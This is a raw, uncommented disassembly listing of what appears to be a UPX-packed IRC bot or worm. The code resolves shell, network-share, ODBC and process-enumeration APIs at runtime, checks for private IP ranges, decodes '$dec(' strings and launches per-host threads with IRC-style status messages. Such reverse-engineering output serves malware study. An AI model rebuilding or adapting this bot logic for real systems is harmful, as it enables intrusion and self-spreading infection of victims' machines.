call esi ; dword_47B4F8
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov dword_413F64, eax
call esi ; dword_47B4F8
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov dword_413F1C, eax
call esi ; dword_47B4F8
cmp dword_413F6C, ebx
mov dword_413D9C, eax
jz short loc_40614F
cmp dword_413F64, ebx
jz short loc_40614F
cmp dword_413F1C, ebx
jz short loc_40614F
cmp eax, ebx
jnz short loc_406159
jmp short loc_40614F
; ---------------------------------------------------------------------------
loc_406144: ; CODE XREF: sub_4053A3+D4D�j
call ds:dword_47B4E4 ; RtlGetLastWin32Error
mov dword_413FEC, eax
loc_40614F: ; CODE XREF: sub_4053A3+D89�j
; sub_4053A3+D91�j ...
mov dword_413FE8, 1
loc_406159: ; CODE XREF: sub_4053A3+D9D�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; dword_47B4B0
mov edi, eax
cmp edi, ebx
jz short loc_40618E
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; dword_47B4F8
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov dword_413DD8, eax
call esi ; dword_47B4F8
cmp dword_413DD8, ebx
mov dword_413F30, eax
jz short loc_406199
cmp eax, ebx
jnz short loc_4061A3
jmp short loc_406199
; ---------------------------------------------------------------------------
loc_40618E: ; CODE XREF: sub_4053A3+DC1�j
call ds:dword_47B4E4 ; RtlGetLastWin32Error
mov dword_413FF4, eax
loc_406199: ; CODE XREF: sub_4053A3+DE3�j
; sub_4053A3+DE9�j
mov dword_413FF0, 1
loc_4061A3: ; CODE XREF: sub_4053A3+DE7�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; dword_47B4B0
mov edi, eax
cmp edi, ebx
jz short loc_40622C
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; dword_47B4F8
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov dword_413EE4, eax
call esi ; dword_47B4F8
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov dword_413F44, eax
call esi ; dword_47B4F8
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov dword_413E40, eax
call esi ; dword_47B4F8
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov dword_413DF0, eax
call esi ; dword_47B4F8
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov dword_413EC4, eax
call esi ; dword_47B4F8
cmp dword_413EE4, ebx
mov dword_413DFC, eax
jz short loc_406237
cmp dword_413F44, ebx
jz short loc_406237
cmp dword_413E40, ebx
jz short loc_406237
cmp dword_413DF0, ebx
jz short loc_406237
cmp dword_413EC4, ebx
jz short loc_406237
cmp eax, ebx
jnz short loc_406241
jmp short loc_406237
; ---------------------------------------------------------------------------
loc_40622C: ; CODE XREF: sub_4053A3+E0B�j
call ds:dword_47B4E4 ; RtlGetLastWin32Error
mov dword_413FFC, eax
loc_406237: ; CODE XREF: sub_4053A3+E61�j
; sub_4053A3+E69�j ...
mov dword_413FF8, 1
loc_406241: ; CODE XREF: sub_4053A3+E85�j
push offset aPsapi_dll ; "psapi.dll"
call ebp ; dword_47B4B0
mov edi, eax
cmp edi, ebx
jz short loc_4062B6
push offset aGetmodulefilen ; "GetModuleFileNameExA"
push edi
call esi ; dword_47B4F8
push offset aGetmodulebasen ; "GetModuleBaseNameA"
push edi
mov dword_413E3C, eax
call esi ; dword_47B4F8
push offset aEnumprocessmod ; "EnumProcessModules"
push edi
mov dword_413D84, eax
call esi ; dword_47B4F8
push offset aEnumprocesses ; "EnumProcesses"
push edi
mov dword_413E44, eax
call esi ; dword_47B4F8
push offset aGetprocessmemo ; "GetProcessMemoryInfo"
push edi
mov dword_413E90, eax
call esi ; dword_47B4F8
cmp dword_413D84, ebx
mov dword_413F0C, eax
jz short loc_4062AB
cmp dword_413E44, ebx
jz short loc_4062AB
cmp dword_413E90, ebx
jz short loc_4062AB
cmp eax, ebx
jnz short loc_4062CB
loc_4062AB: ; CODE XREF: sub_4053A3+EF2�j
; sub_4053A3+EFA�j ...
push 1
pop edi
mov dword_414008, edi
jmp short loc_4062CE
; ---------------------------------------------------------------------------
loc_4062B6: ; CODE XREF: sub_4053A3+EA9�j
call ds:dword_47B4E4 ; RtlGetLastWin32Error
mov dword_41400C, eax
mov dword_414008, 1
loc_4062CB: ; CODE XREF: sub_4053A3+F06�j
push 1
pop edi
loc_4062CE: ; CODE XREF: sub_4053A3+F11�j
push offset aShlwapi_dll ; "shlwapi.dll"
call ebp ; dword_47B4B0
cmp eax, ebx
jz short loc_4062EC
push offset aPathremovefile ; "PathRemoveFileSpecA"
push eax
call esi ; dword_47B4F8
cmp eax, ebx
mov dword_413E08, eax
jnz short loc_4062FD
jmp short loc_4062F7
; ---------------------------------------------------------------------------
loc_4062EC: ; CODE XREF: sub_4053A3+F34�j
call ds:dword_47B4E4 ; RtlGetLastWin32Error
mov dword_41401C, eax
loc_4062F7: ; CODE XREF: sub_4053A3+F47�j
mov dword_414018, edi
loc_4062FD: ; CODE XREF: sub_4053A3+F45�j
mov eax, edi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_4053A3 endp
; ---------------------------------------------------------------------------
db 3D8h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_4066DC proc near ; CODE XREF: sub_40114F�j
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_47B740 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_406704
push [esp+arg_0]
call ds:dword_47B70C ; gethostbyname
test eax, eax
jnz short loc_4066FD
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_4066FD: ; CODE XREF: sub_4066DC+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_406704: ; CODE XREF: sub_4066DC+D�j
retn
sub_4066DC endp
; ---------------------------------------------------------------------------
db 0Ah dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40670F proc near ; CODE XREF: sub_4010DC�j
push esi
push edi
push 40h
xor edi, edi
push off_4101F8
call ds:dword_47B608 ; strchr
mov ecx, off_4101F8
sub eax, ecx
push ecx
inc eax
mov esi, eax
call sub_40C28E ; strlen
add esp, 0Ch
loc_406735: ; CODE XREF: sub_40670F+49�j
cmp esi, eax
jnb short loc_40675A
mov eax, off_4101F8
mov ecx, off_4101FC
mov al, [eax+esi]
mov [ecx+edi], al
push off_4101F8
inc edi
inc esi
call sub_40C28E ; strlen
pop ecx
jmp short loc_406735
; ---------------------------------------------------------------------------
loc_40675A: ; CODE XREF: sub_40670F+28�j
mov eax, off_4101FC
pop edi
pop esi
retn
sub_40670F endp
; ---------------------------------------------------------------------------
db 14h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406776 proc near ; CODE XREF: sub_4010E1�j
var_30 = byte ptr -30h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30h
cmp [ebp+arg_0], 0
push ebx
push esi
push edi
jz loc_40687B
push offset byte_413980
push [ebp+arg_0]
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40687B
push 20h
lea eax, [ebp+var_30]
push [ebp+arg_0]
push eax
call ds:dword_47B614 ; strncpy
mov esi, ds:dword_47B5D0
mov edi, offset a_ ; "."
lea eax, [ebp+var_30]
push edi
push eax
call esi ; dword_47B5D0
add esp, 14h
mov [ebp+var_10], eax
test eax, eax
jz loc_40687B
mov [ebp+arg_0], 1
lea ebx, [ebp+var_C]
loc_4067D9: ; CODE XREF: sub_406776+7E�j
push edi
push 0
call esi ; dword_47B5D0
pop ecx
mov [ebx], eax
test eax, eax
pop ecx
jz loc_40687B
inc [ebp+arg_0]
add ebx, 4
cmp [ebp+arg_0], 4
jl short loc_4067D9
mov esi, [ebp+var_10]
push offset a10 ; "10"
push esi
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_406876
push offset a172 ; "172"
push esi
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40682E
push offset a16 ; "16"
push [ebp+var_C]
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_406876
loc_40682E: ; CODE XREF: sub_406776+A3�j
push offset a192 ; "192"
push esi
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_406852
push offset a168 ; "168"
push [ebp+var_C]
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_406876
loc_406852: ; CODE XREF: sub_406776+C7�j
push offset a90 ; "90"
push esi
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40687B
push offset a0 ; "0"
push [ebp+var_C]
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40687B
loc_406876: ; CODE XREF: sub_406776+92�j
; sub_406776+B6�j ...
push 1
pop eax
jmp short loc_40687D
; ---------------------------------------------------------------------------
loc_40687B: ; CODE XREF: sub_406776+D�j
; sub_406776+24�j ...
xor eax, eax
loc_40687D: ; CODE XREF: sub_406776+103�j
pop edi
pop esi
pop ebx
leave
retn
sub_406776 endp
; ---------------------------------------------------------------------------
db 43h dup(0CCh)
; ---------------------------------------------------------------------------
loc_4068C5: ; CODE XREF: sub_401122�j
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
push edi
call sub_4010DC
push 6
mov esi, offset aAbcdefghijklmn ; "abcdefghijklmnopqrstuvwxyz"
pop ecx
lea edi, [ebp-20h]
rep movsd
movsw
mov ebx, eax
movsb
mov edi, ds:dword_47B614
mov esi, offset dword_4136BC
test ebx, ebx
jnz short loc_4068FD
push 10h
push offset dword_4137E8
jmp short loc_40693B
; ---------------------------------------------------------------------------
loc_4068FD: ; CODE XREF: UPX0:004068F2�j
lea eax, [ebp-20h]
push eax
push off_4101FC
call ds:dword_47B5CC ; strcspn
pop ecx
test eax, eax
pop ecx
jge short loc_406918
push 10h
push ebx
jmp short loc_40693B
; ---------------------------------------------------------------------------
loc_406918: ; CODE XREF: UPX0:00406911�j
push ebx
call dword_413EE8 ; inet_addr
push ebx
call dword_413F40 ; gethostbyname
test eax, eax
jz short loc_406941
mov eax, [eax+0Ch]
push 10h
mov eax, [eax]
mov eax, [eax]
push eax
call dword_413F48 ; inet_ntoa
push eax
loc_40693B: ; CODE XREF: UPX0:004068FB�j
; UPX0:00406916�j
push esi
call edi ; dword_47B614
add esp, 0Ch
loc_406941: ; CODE XREF: UPX0:00406928�j
push esi
call dword_413EE8 ; inet_addr
mov [ebp-4], eax
push 2
lea eax, [ebp-4]
push 4
push eax
call dword_413E30 ; gethostbyaddr
test eax, eax
push 100h
jz short loc_406966
push dword ptr [eax]
jmp short loc_40696B
; ---------------------------------------------------------------------------
loc_406966: ; CODE XREF: UPX0:00406960�j
push offset off_40F78C
loc_40696B: ; CODE XREF: UPX0:00406964�j
push offset dword_4136E8
call edi ; dword_47B614
add esp, 0Ch
push 0
call ds:dword_47B4C4 ; ExitThread
pop edi
pop esi
pop ebx
; ---------------------------------------------------------------------------
db 2Eh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4069AE proc near ; CODE XREF: sub_401285�j
var_154 = byte ptr -154h
var_10C = byte ptr -10Ch
var_106 = byte ptr -106h
var_105 = byte ptr -105h
var_102 = byte ptr -102h
var_101 = byte ptr -101h
var_FD = byte ptr -0FDh
var_F3 = byte ptr -0F3h
var_F2 = byte ptr -0F2h
var_F1 = byte ptr -0F1h
var_EF = byte ptr -0EFh
var_EE = byte ptr -0EEh
var_EC = byte ptr -0ECh
var_E2 = byte ptr -0E2h
var_E1 = byte ptr -0E1h
var_DE = byte ptr -0DEh
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = byte ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 154h
push ebx
push esi
push edi
xor ebx, ebx
push 100h
lea eax, [ebp+var_154]
push ebx
push eax
call sub_40C294 ; memset
mov eax, [ebp+arg_8]
add esp, 0Ch
cmp eax, ebx
mov esi, eax
jl short loc_406A3E
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax*4]
loc_4069E0: ; CODE XREF: sub_4069AE+8E�j
mov eax, [ecx]
cmp eax, ebx
jz short loc_406A36
mov dl, [eax]
cmp dl, 2Dh
jnz short loc_406A3E
cmp [eax+2], bl
jnz short loc_406A00
movsx edx, byte ptr [eax+1]
mov [ebp+edx+var_154], 1
jmp short loc_406A28
; ---------------------------------------------------------------------------
loc_406A00: ; CODE XREF: sub_4069AE+42�j
cmp dl, 2Dh
jnz short loc_406A3E
cmp byte ptr [eax+2], 3Ah
jnz short loc_406A3E
cmp [eax+4], bl
jnz short loc_406A3E
movsx edx, byte ptr [eax+1]
mov [ebp+edx+var_154], 1
cmp byte ptr [eax+1], 72h
jnz short loc_406A28
mov dl, [eax+3]
mov [ebp+var_3C], dl
loc_406A28: ; CODE XREF: sub_4069AE+50�j
; sub_4069AE+72�j
mov [eax], bl
mov eax, [ecx]
mov [eax+1], bl
mov eax, [ecx]
mov [eax+2], bl
mov [ecx], ebx
loc_406A36: ; CODE XREF: sub_4069AE+36�j
dec esi
sub ecx, 4
cmp esi, ebx
jge short loc_4069E0
loc_406A3E: ; CODE XREF: sub_4069AE+2A�j
; sub_4069AE+3D�j ...
movzx eax, [ebp+var_E1]
movzx ecx, [ebp+var_EE]
mov [ebp+var_54], eax
mov [ebp+var_44], ecx
movzx eax, [ebp+var_EC]
movzx ecx, [ebp+var_FD]
movzx edx, [ebp+var_105]
mov [ebp+var_50], eax
mov [ebp+var_38], ecx
movzx eax, [ebp+var_DE]
movzx ecx, [ebp+var_E2]
movzx edi, [ebp+var_F2]
mov [ebp+var_4C], eax
mov [ebp+var_34], edx
movzx eax, [ebp+var_101]
movzx edx, [ebp+var_10C]
movzx esi, [ebp+var_102]
mov [ebp+var_48], eax
mov [ebp+var_30], eax
movzx eax, [ebp+var_F3]
mov [ebp+var_40], ecx
mov [ebp+var_1C], edi
movzx edi, [ebp+var_F1]
mov [ebp+var_14], ecx
mov [ebp+var_2C], edx
movzx ecx, [ebp+var_EF]
movzx edx, [ebp+var_106]
mov [ebp+var_20], eax
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
push 15h
mov [ebp+var_28], esi
mov [ebp+var_18], edi
mov [ebp+var_10], ecx
mov [ebp+var_4], esi
pop ecx
lea esi, [ebp+var_54]
mov edi, eax
mov [ebp+var_24], edx
mov [ebp+var_C], edx
rep movsd
pop edi
pop esi
pop ebx
leave
retn
sub_4069AE endp
; ---------------------------------------------------------------------------
db 51h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406B46 proc near ; CODE XREF: sub_4010B4�j
var_654 = byte ptr -654h
var_254 = byte ptr -254h
var_154 = dword ptr -154h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 654h
inc [ebp+arg_0]
push ebx
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_654]
push eax
call sub_40C25E ; strcpy
push 40h
lea eax, [ebp+var_100]
push [ebp+arg_0]
push eax
call sub_4011A9
mov cl, [ebp+var_654]
add esp, 14h
cmp cl, byte_40FB8B
mov [ebp+arg_0], eax
jnz loc_406D95
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_154]
push eax
call sub_401285
add esp, 0Ch
mov esi, eax
lea edi, [ebp+var_154]
push 15h
pop ecx
rep movsd
xor esi, esi
cmp [ebp+var_100], esi
jz loc_406DF2
mov eax, [ebp+var_100]
mov al, [eax]
cmp al, byte_40FB8B
jnz short loc_406C37
mov ebx, [ebp+arg_4]
mov edi, [ebp+arg_8]
inc [ebp+var_100]
mov ecx, edi
push dword ptr [ebx+8]
push dword ptr [ebx+4]
push dword ptr [ebx]
call sub_4011DB
test eax, eax
mov ecx, edi
jz short loc_406C3E
call sub_40112C
push eax
push dword ptr [ebx+0Ch]
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_406C09
mov eax, [ebx]
mov [ebx+0Ch], eax
loc_406C09: ; CODE XREF: sub_406B46+BC�j
push esi
lea eax, [ebp+var_654]
sub esp, 54h
lea esi, [ebp+var_154]
push 15h
pop ecx
mov edi, esp
push [ebp+arg_8]
rep movsd
push ebx
push eax
push [ebp+arg_0]
lea eax, [ebp+var_100]
push eax
call sub_401023
add esp, 6Ch
loc_406C37: ; CODE XREF: sub_406B46+87�j
; sub_406B46+13B�j ...
xor eax, eax
loc_406C39: ; CODE XREF: sub_406B46+2AF�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_406C3E: ; CODE XREF: sub_406B46+A8�j
call sub_40112C
push eax
push dword ptr [ebx+0Ch]
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_406C57
mov eax, [ebx]
mov [ebx+0Ch], eax
loc_406C57: ; CODE XREF: sub_406B46+10A�j
push offset dword_40E004
push [ebp+var_100]
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_406C83
push offset dword_40E00C
push [ebp+var_100]
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_406C37
loc_406C83: ; CODE XREF: sub_406B46+125�j
cmp [ebp+var_FC], esi
jz loc_406DF2
push dword ptr [ebx+8]
lea eax, [ebp+var_254]
push dword ptr [ebx+4]
push dword ptr [ebx]
push offset dword_411390
push 100h
push eax
call ds:dword_47B620 ; _snprintf
add esp, 18h
cmp dword_410204, 0
jle short loc_406CE5
mov [ebp+arg_8], offset off_40FC10
loc_406CC1: ; CODE XREF: sub_406B46+19D�j
lea eax, [ebp+var_254]
push eax
mov eax, [ebp+arg_8]
push dword ptr [eax]
call sub_4010D2
pop ecx
test eax, eax
pop ecx
jnz short loc_406D11
add [ebp+arg_8], 4
inc esi
cmp esi, dword_410204
jl short loc_406CC1
loc_406CE5: ; CODE XREF: sub_406B46+172�j
; sub_406B46+1DF�j
mov ecx, edi
call sub_401113
push [ebp+var_FC]
test eax, eax
push dword ptr [ebx+8]
push dword ptr [ebx+4]
push dword ptr [ebx]
push offset aSSS@STriedS ; "%s %s!%s@%s (Tried: %s)"
jz short loc_406D79
push edi
call sub_4012F3
add esp, 18h
jmp loc_406DF2
; ---------------------------------------------------------------------------
loc_406D11: ; CODE XREF: sub_406B46+190�j
push [ebp+var_FC]
push offset dword_40FBEC
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_406CE5
push dword ptr [ebx+8]
mov ecx, edi
push dword ptr [ebx+4]
push dword ptr [ebx]
call sub_40114A
cmp eax, 0FFFFFFFFh
jnz short loc_406D54
cmp [ebp+var_154], 0
jnz loc_406DF2
push offset dword_4101B8
push offset aS__0 ; "%s ."
jmp short loc_406D6B
; ---------------------------------------------------------------------------
loc_406D54: ; CODE XREF: sub_406B46+1F3�j
cmp [ebp+var_154], 0
jnz loc_406DF2
push offset dword_4101B8
push offset aS_ ; "%s [+]."
loc_406D6B: ; CODE XREF: sub_406B46+20C�j
push dword ptr [ebx+0Ch]
push edi
call sub_40104B
add esp, 10h
jmp short loc_406DF2
; ---------------------------------------------------------------------------
loc_406D79: ; CODE XREF: sub_406B46+1BB�j
mov eax, dword_413814
imul eax, 188h
add eax, offset dword_40FD96
push eax
push edi
call sub_40104B
add esp, 1Ch
jmp short loc_406DF2
; ---------------------------------------------------------------------------
loc_406D95: ; CODE XREF: sub_406B46+41�j
mov ecx, [ebp+arg_8]
call sub_40112C
mov esi, [ebp+arg_4]
mov edi, ds:dword_47B4E0
push eax
push dword ptr [esi+0Ch]
call edi ; dword_47B4E0
test eax, eax
jnz short loc_406DF2
push [ebp+var_100]
push offset dword_411384
call edi ; dword_47B4E0
test eax, eax
jz short loc_406DE2
push [ebp+var_100]
push offset dword_41137C
call edi ; dword_47B4E0
test eax, eax
jnz loc_406C37
cmp [ebp+var_FC], eax
jz loc_406C37
loc_406DE2: ; CODE XREF: sub_406B46+279�j
push dword ptr [esi+8]
mov ecx, [ebp+arg_8]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_4011DB
loc_406DF2: ; CODE XREF: sub_406B46+73�j
; sub_406B46+143�j ...
push 1
pop eax
jmp loc_406C39
sub_406B46 endp
; ---------------------------------------------------------------------------
db 0ADh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406EA7 proc near ; CODE XREF: sub_4010B9�j
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, [ebp+arg_8]
mov ecx, esi
call sub_40112C
push eax
push [ebp+arg_0]
call ds:dword_47B610 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_406F45
push 2
lea eax, [ebp+var_8]
push [ebp+arg_0]
push eax
call sub_4011A9
add esp, 0Ch
cmp [ebp+var_8], 0
jz short loc_406F45
cmp [ebp+var_4], 0
jz short loc_406F45
mov eax, dword_413814
imul eax, 188h
add eax, offset dword_40FD38
push eax
push [ebp+var_8]
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_406F25
mov eax, dword_413814
imul eax, 188h
lea ecx, dword_40FD4A[eax]
lea eax, dword_40FD38[eax]
push ecx
push eax
mov ecx, esi
call sub_4010FA
jmp short loc_406F2F
; ---------------------------------------------------------------------------
loc_406F25: ; CODE XREF: sub_406EA7+5A�j
push [ebp+var_8]
mov ecx, esi
call sub_40124E
loc_406F2F: ; CODE XREF: sub_406EA7+7C�j
mov eax, [ebp+arg_4]
push dword ptr [eax]
push offset aErrS_ ; "err! %s."
push [ebp+var_8]
push esi
call sub_40104B
add esp, 10h
loc_406F45: ; CODE XREF: sub_406EA7+1E�j
; sub_406EA7+35�j ...
xor eax, eax
pop esi
leave
retn
sub_406EA7 endp
; ---------------------------------------------------------------------------
db 28h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406F72 proc near ; CODE XREF: sub_4012D5�j
var_530 = byte ptr -530h
var_32C = byte ptr -32Ch
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
var_2C = byte ptr -2Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 530h
push esi
mov esi, ds:dword_47B614
push edi
push 202h
push [ebp+arg_0]
lea eax, [ebp+var_530]
push eax
call esi ; dword_47B614
lea eax, [ebp+var_530]
push 3
push eax
lea eax, [ebp+var_C]
push eax
call sub_4011A9
add esp, 18h
cmp [ebp+var_C], 0
jz loc_407102
cmp [ebp+var_8], 0
jz loc_407102
mov ecx, [ebp+arg_8]
call sub_40112C
push eax
push [ebp+var_C]
call sub_40C252 ; strcmp
pop ecx
pop ecx
test eax, eax
push 10h
jnz short loc_406FDB
push [ebp+var_8]
jmp short loc_406FDE
; ---------------------------------------------------------------------------
loc_406FDB: ; CODE XREF: sub_406F72+62�j
push [ebp+var_C]
loc_406FDE: ; CODE XREF: sub_406F72+67�j
lea eax, [ebp+var_2C]
push eax
call esi ; dword_47B614
add esp, 0Ch
push 3Ah
push [ebp+arg_0]
call ds:dword_47B608 ; strchr
mov esi, eax
pop ecx
inc esi
pop ecx
cmp byte ptr [esi], 24h
jnz short loc_40704D
mov edi, ds:dword_47B610
push offset aDec ; "$dec("
push esi
call edi ; dword_47B610
pop ecx
test eax, eax
pop ecx
jz short loc_40704D
push offset asc_4113A8 ; ")"
push esi
call edi ; dword_47B610
pop ecx
test eax, eax
pop ecx
jz short loc_40704D
push esi
call sub_40C28E ; strlen
cmp eax, 6
pop ecx
jbe short loc_40704D
push esi
call sub_40C28E ; strlen
dec eax
dec eax
push eax
push 5
push esi
call sub_4010FF
mov edi, eax
add esp, 10h
test edi, edi
jz short loc_40704D
push edi
call sub_4010E6
pop ecx
mov esi, edi
loc_40704D: ; CODE XREF: sub_406F72+88�j
; sub_406F72+9C�j ...
mov edi, offset asc_4105F0 ; "|"
push ebx
push edi
push esi
mov esi, ds:dword_47B5D0
call esi ; dword_47B5D0
pop ecx
mov [ebp+var_12C], eax
pop ecx
mov [ebp+arg_0], 1
lea ebx, [ebp+var_128]
loc_407072: ; CODE XREF: sub_406F72+117�j
push edi
push 0
call esi ; dword_47B5D0
pop ecx
mov [ebx], eax
test eax, eax
pop ecx
jz short loc_40708B
inc [ebp+arg_0]
add ebx, 4
cmp [ebp+arg_0], 40h
jl short loc_407072
loc_40708B: ; CODE XREF: sub_406F72+10B�j
mov edi, [ebp+arg_0]
lea eax, [ebp+var_2C]
mov [ebp+var_10], eax
mov eax, offset aTopic ; "topic"
test edi, edi
mov [ebp+var_1C], eax
mov [ebp+var_18], eax
mov [ebp+var_14], eax
pop ebx
jle short loc_407102
lea esi, [ebp+var_12C]
loc_4070AD: ; CODE XREF: sub_406F72+18E�j
mov eax, [esi]
test eax, eax
jz short loc_4070FC
push eax
lea eax, [ebp+var_32C]
push offset dword_41139C
push eax
call ds:dword_47B5FC ; sprintf
mov al, [ebp+var_32C]
add esp, 0Ch
cmp al, byte_40FB8B
jnz short loc_4070FC
push 3E8h
call ds:dword_47B4EC ; Sleep
push 1
push 1
push [ebp+arg_8]
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_32C]
push eax
call sub_40100F
add esp, 14h
loc_4070FC: ; CODE XREF: sub_406F72+13F�j
; sub_406F72+163�j
add esi, 4
dec edi
jnz short loc_4070AD
loc_407102: ; CODE XREF: sub_406F72+3B�j
; sub_406F72+45�j ...
pop edi
xor eax, eax
pop esi
leave
retn
sub_406F72 endp
; ---------------------------------------------------------------------------
db 65h dup(0CCh)
; ---------------------------------------------------------------------------
loc_40716D: ; CODE XREF: UPX0:loc_401172�j
push ebp
mov ebp, esp
sub esp, 154h
push esi
lea eax, [ebp+10h]
push edi
mov edi, [ebp+10h]
xor esi, esi
push eax
lea eax, [ebp-154h]
push esi
push eax
push offset sub_401299
push esi
push esi
mov dword ptr [ebp-94h], 94h
mov [ebp-154h], edi
mov [ebp-98h], esi
call ds:dword_47B4DC ; CreateThread
loc_4071AC: ; CODE XREF: UPX0:004071BC�j
cmp [ebp-98h], esi
jnz short loc_4071BE
push 32h
call ds:dword_47B4EC ; Sleep
jmp short loc_4071AC
; ---------------------------------------------------------------------------
loc_4071BE: ; CODE XREF: UPX0:004071B2�j
mov eax, dword_413814
mov ecx, edi
imul eax, 188h
add eax, offset word_40FD5A
push eax
call sub_4011B8
mov eax, dword_413814
imul eax, 188h
lea ecx, dword_40FD4A[eax]
lea eax, dword_40FD38[eax]
push ecx
push eax
mov ecx, edi
call sub_4010FA
lea eax, [ebp-94h]
push eax
call ds:dword_47B51C ; GetVersionExA
test eax, eax
jz short loc_407239
cmp dword ptr [ebp-90h], 5
jnz short loc_407239
cmp dword ptr [ebp-8Ch], 2
jnz short loc_407239
mov eax, dword_413814
imul eax, 188h
lea ecx, dword_40FD4A[eax]
lea eax, dword_40FD96[eax]
push ecx
push eax
mov ecx, edi
call sub_4010FA
loc_407239: ; CODE XREF: UPX0:00407205�j
; UPX0:0040720E�j ...
pop edi
xor eax, eax
pop esi
leave
retn
; ---------------------------------------------------------------------------
db 34h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407273 proc near ; CODE XREF: sub_401064�j
var_144 = byte ptr -144h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 144h
push ebx
push esi
mov esi, ds:dword_47B5D0
and [ebp+var_4], 0
push edi
mov edi, offset asc_4113B4 ; " "
push edi
push [ebp+arg_0]
call esi ; dword_47B5D0
pop ecx
test eax, eax
pop ecx
jz short loc_4072B3
lea ebx, [ebp+var_144]
loc_4072A0: ; CODE XREF: sub_407273+3E�j
push edi
push 0
call esi ; dword_47B5D0
inc [ebp+var_4]
mov [ebx], eax
pop ecx
add ebx, 4
test eax, eax
pop ecx
jnz short loc_4072A0
loc_4072B3: ; CODE XREF: sub_407273+25�j
mov eax, [ebp+var_4]
dec eax
test eax, eax
jle short loc_4072F5
lea edi, [ebp+var_144]
mov ebx, eax
loc_4072C3: ; CODE XREF: sub_407273+80�j
mov esi, [edi]
push 40h
push esi
call ds:dword_47B608 ; strchr
pop ecx
test eax, eax
pop ecx
jle short loc_4072EF
lea eax, [ebp+arg_0]
mov off_4101F8, esi
push eax
xor eax, eax
push eax
push eax
push offset sub_401122
push eax
push eax
call ds:dword_47B4DC ; CreateThread
loc_4072EF: ; CODE XREF: sub_407273+5F�j
add edi, 4
dec ebx
jnz short loc_4072C3
loc_4072F5: ; CODE XREF: sub_407273+46�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_407273 endp
